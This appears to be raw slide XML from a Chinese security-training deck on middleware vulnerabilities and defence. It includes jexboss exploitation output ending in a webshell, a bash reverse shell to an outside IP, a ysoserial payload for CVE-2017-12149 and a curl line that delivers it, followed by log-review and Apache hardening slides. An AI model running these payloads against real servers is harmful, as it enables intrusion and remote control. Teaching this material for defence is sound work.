              <a:t>这三个漏洞，并且可以获得一个</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>shell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25428" y="3811270"/>
            <a:ext cx="767080" cy="284480"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="767079" h="284479">
                <a:moveTo>
                  <a:pt x="0" y="284479"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="766572" y="284479"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="76657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336800" cy="284480"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="2336800" h="284479">
                <a:moveTo>
                  <a:pt x="0" y="284479"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2336292" y="284479"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23362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743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漏洞利用与防范：</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="5" dirty="0">
                <a:latin typeface="Arial Black"/>
                <a:cs typeface="Arial Black"/>
              </a:rPr>
              <a:t>j</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-95" dirty="0">
                <a:latin typeface="Arial Black"/>
                <a:cs typeface="Arial Black"/>
              </a:rPr>
              <a:t>e</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0">
                <a:latin typeface="Arial Black"/>
                <a:cs typeface="Arial Black"/>
              </a:rPr>
              <a:t>xbo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使用方法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2871216" y="1575816"/>
            <a:ext cx="8554720" cy="5017135"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="8554720" h="5017134">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="8554212" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8554212" y="5017008"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="501700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7113" y="1571371"/>
            <a:ext cx="8562975" cy="5026660"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="8562975" h="5026659">
                <a:moveTo>
                  <a:pt x="8557628" y="5026291"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4762" y="5026291"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3289" y="5026050"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1955" y="5025377"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="901" y="5024323"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="228" y="5022989"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="5021529"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4762" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8557628" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="856239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5016766"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4762" y="5016766"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9525" y="5021529"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8562390" y="5021529"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8562162" y="5022989"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8561489" y="5024323"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8560435" y="5025377"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8559101" y="5026050"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8557628" y="5026291"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="8562975" h="502665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8562975" h="5026659">
                <a:moveTo>
                  <a:pt x="855286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8552865" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8552865" y="9524"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="8562975" h="5026659">
                <a:moveTo>
                  <a:pt x="8552865" y="5021529"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="8552865" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8557628" y="9524"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8562390" y="9524"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8562390" y="5016766"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8557628" y="5016766"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8552865" y="5021529"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="8562975" h="5026659">
                <a:moveTo>
                  <a:pt x="8562390" y="9524"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="8557628" y="9524"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8552865" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8562390" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8562390" y="9524"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="8562975" h="5026659">
                <a:moveTo>
                  <a:pt x="9525" y="5021529"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4762" y="5016766"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9525" y="5016766"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9525" y="5021529"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="8562975" h="5026659">
                <a:moveTo>
                  <a:pt x="8552865" y="5021529"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9525" y="5021529"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9525" y="5016766"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8552865" y="5016766"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8552865" y="5021529"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="8562975" h="5026659">
                <a:moveTo>
                  <a:pt x="8562390" y="5021529"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="8552865" y="5021529"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8557628" y="5016766"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8562390" y="5016766"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8562390" y="5021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63316" y="2119196"/>
            <a:ext cx="7920355" cy="437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spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>$ python jexboss.py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https://site-teste.com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$ python jexboss.py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https://site-teste.com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— JexBoss: Jboss verify and EXploitation </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-50" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Tool </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>—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*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| |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| @author: João Filho Matos Figueiredo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|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| @contact: </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>joaomatosf@gmail.com</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="10" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>|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| |</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marR="158305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| @update: https://github.com/joaomatosf/jexboss |  #______________________________________________________#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** Checking Host: https://site-teste.com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**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Checking web-console: [ OK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Checking jmx-console: [ VULNERABLE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Checking JMXInvokerServlet: [ VULNERABLE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Do you want to try to run an automated exploitation via “jmx-console”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This operation will provide a simple command shell to execute commands on the </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-15" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>server.  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Continue only if you have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permission!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yes/NO ?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yes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6292" y="2025395"/>
            <a:ext cx="8552815" cy="4772025"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="8552815" h="4772025">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="8552688" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8552688" y="4771644"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="477164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1008" y="2021077"/>
            <a:ext cx="8562975" cy="4780280"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="8562975" h="4780280">
                <a:moveTo>
                  <a:pt x="8557628" y="4780064"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4762" y="4780064"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3289" y="4779822"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1955" y="4779149"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="901" y="4778095"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="228" y="4776774"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="4775301"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4762" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8557628" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="856239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770539"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4762" y="4770539"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9525" y="4775301"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8562390" y="4775301"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8562162" y="4776774"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8561489" y="4778095"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8560435" y="4779149"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8559101" y="4779822"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8557628" y="4780064"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="8562975" h="478028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562975" h="4780280">
                <a:moveTo>
                  <a:pt x="855286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552865" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8552865" y="9525"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="8562975" h="4780280">
                <a:moveTo>
                  <a:pt x="8552865" y="4775301"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="8552865" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8557628" y="9525"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8562390" y="9525"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8562390" y="4770539"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8557628" y="4770539"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8552865" y="4775301"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="8562975" h="4780280">
                <a:moveTo>
                  <a:pt x="8562390" y="9525"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="8557628" y="9525"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8552865" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8562390" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8562390" y="9525"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="8562975" h="4780280">
                <a:moveTo>
                  <a:pt x="9525" y="4775301"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4762" y="4770539"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9525" y="4770539"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9525" y="4775301"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="8562975" h="4780280">
                <a:moveTo>
                  <a:pt x="8552865" y="4775301"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9525" y="4775301"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9525" y="4770539"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8552865" y="4770539"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8552865" y="4775301"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="8562975" h="4780280">
                <a:moveTo>
                  <a:pt x="8562390" y="4775301"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="8552865" y="4775301"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8557628" y="4770539"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8562390" y="4770539"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8562390" y="477530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8680" y="1393825"/>
            <a:ext cx="10234295" cy="531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89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jexboss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使用方法</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:latin typeface="Noto Sans CJK JP Regular"/>
              <a:cs typeface="Noto Sans CJK JP Regular"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="2244090">
              <a:lnSpc>
                <a:spcPts val="1650"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>$ git clone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https://github.com/joaomatosf/jexboss.git</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="2244090">
              <a:lnSpc>
                <a:spcPts val="1770"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>$ cd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jexboss</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1708150">
              <a:lnSpc>
                <a:spcPts val="1770"/>
              </a:lnSpc>
              <a:buChar char="*"/>
              <a:tabLst>
                <a:tab pos="1844675" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Sending exploit code to https://site-teste.com.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Wait…</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1708150" marR="3030855">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buChar char="*"/>
              <a:tabLst>
                <a:tab pos="1844675" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Info: This exploit will force the server to deploy the webshell  available on: </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://www.joaomatosf.com/rnp/jbossass.war</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1708150">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buChar char="*"/>
              <a:tabLst>
                <a:tab pos="1844675" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Successfully deployed code! Starting command shell,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wait…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*"/>
            </a:pPr>
            <a:endParaRPr sz="1650">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="17081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– – – – – – – – – – – – – – – – – – – – LOL – – – – – – – – – – – – – – – – – – – –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*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08150">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buChar char="*"/>
              <a:tabLst>
                <a:tab pos="1844675" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>https://site-teste.com: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708150" marR="315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Linux seglinux 3.18.4-1.el6.elrepo.x86_64 #1 SMP </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-15" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Wed </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Jan 28 13:28:52 EST 2015 x86_64  x86_64 x86_64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GNU/Linux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081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CentOS release 6.5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(Final)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7081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uid=509(jboss) gid=509(jboss) grupos=509(jboss)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context=system_u:system_r:initrc_t:s0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770"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pP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708150">
              <a:lnSpc>
                <a:spcPts val="1770"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="1600" spc="-25" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>[Type </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>commands or “exit” to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finish]</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="17081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Shell&gt; pwd</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="17081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/usr/jboss-6.1.0.Final/bin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日志审核查看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52250"/>
            <a:ext cx="9579610" cy="81724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Access_log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看到指定的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ip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究竟干了什么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# cat default-access_log | grep 218.19.140.242 | awk ‘{print $1″\t”$8}’ | sort | uniq -c | sort -nr |</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="1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less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-JBoss 5.x/6.x</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>反序列化漏洞（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1"/>
              <a:t>CVE-2017-12149</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>）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JBoss 5.x/6.x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反序列化漏洞（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CVE-2017-12149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首先，在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http://jackson.thuraisamy.me/runtime-exec-payloads.html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payload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转换：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bash -i &gt;&amp; /dev/tcp/13.94.33.143/8089 0&gt;&amp;1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ysoserial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ser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-jar ysoserial-master.jar CommonsCollections6 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMy45NC4zMy4xNDMvODA4OSAwPiYx}|{base64,-d}|{bash,-i}" &gt; CVE-2017-12149.ser</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="6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https://i.imgur.com/1B5DQ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6155"/>
            <a:ext cx="8001000" cy="523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主流的中间件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8077" y="1796828"/>
            <a:ext cx="6807200" cy="237299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900" spc="350">
                <a:solidFill>
                  <a:srgbClr val="EF7E08"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>主流中间件</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:latin typeface="Noto Sans CJK JP Regular"/>
              <a:cs typeface="Noto Sans CJK JP Regular"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="469265">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1260"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab pos="1756410" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="1600" spc="270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600" spc="400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="EF7E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2000" spc="-5">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>	httpd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" spc="-5">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" spc="-5">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Nginx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200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1600" spc="270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600" spc="395" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="EF7E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endParaRPr sz="20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110"/>
              </a:spcBef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450" spc="114" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="EF7E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全称为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Internet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Information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Service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Internet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信息服务</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-26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469265">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1170"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1600" spc="27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600" spc="395">
                <a:solidFill>
                  <a:srgbClr val="EF7E08"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-45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lang="zh-CN" altLang="en-US" sz="2000" spc="-45">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" spc="-45">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Weblogic</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" spc="-45">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" spc="-45">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>JBoss</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" spc="-45">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>等。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86874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-JBoss 5.x/6.x</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>反序列化漏洞（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1"/>
              <a:t>CVE-2017-12149</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>）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发送序列化数据：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curl http://202.112.51.134:8080/invoker/readonly --data-binary @CVE-2017-12149.ser</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7170" name="Picture 2" descr="https://i.imgur.com/7z59Q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3" y="3581400"/>
            <a:ext cx="115062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831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1074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-JBoss 5.x/6.x</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>反序列化漏洞（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1"/>
              <a:t>CVE-2017-12149</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>）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即可成功得到反弹的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https://i.imgur.com/gP93hM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80105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643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459473"/>
            <a:ext cx="11233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962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Q&amp;A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0640" y="3611879"/>
            <a:ext cx="27432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190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70723"/>
            <a:ext cx="8474710" cy="163378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基金会官方网站</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="18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u="sng" spc="-1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2"/>
              </a:rPr>
              <a:t>http://www.apache.org/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HTTP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简称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），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由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HTTP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Committee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项目官方网站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  <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://httpd.apache.org/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最新版本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httpd 2.4.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" spc="-5">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>33</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-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Released 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95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lang="en-US" altLang="zh-CN" spc="-5">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>2018-03-17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18092" y="1575816"/>
            <a:ext cx="2410968" cy="98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8664" y="3811270"/>
            <a:ext cx="783590" cy="284480"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="783590" h="284479">
                <a:moveTo>
                  <a:pt x="0" y="284479"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="783336" y="284479"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="78333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801620" cy="284480"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="2801620" h="284479">
                <a:moveTo>
                  <a:pt x="0" y="284479"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2801112" y="284479"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="280111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56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dirty="0"/>
              <a:t>服务器的安全设置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680" y="1597723"/>
            <a:ext cx="7587120" cy="2981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配置文件：</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="8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httpd.conf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CentOS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7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默认安装，配置文件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/etc/httpd/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680" y="1999043"/>
            <a:ext cx="502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Root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启动，以服务方式运行，权限为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680" y="2674684"/>
            <a:ext cx="5994400" cy="8280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配置项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ServerRoot</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="4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：目录树，配置文件，日志文件，</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:latin typeface="Noto Sans CJK JP Regular"/>
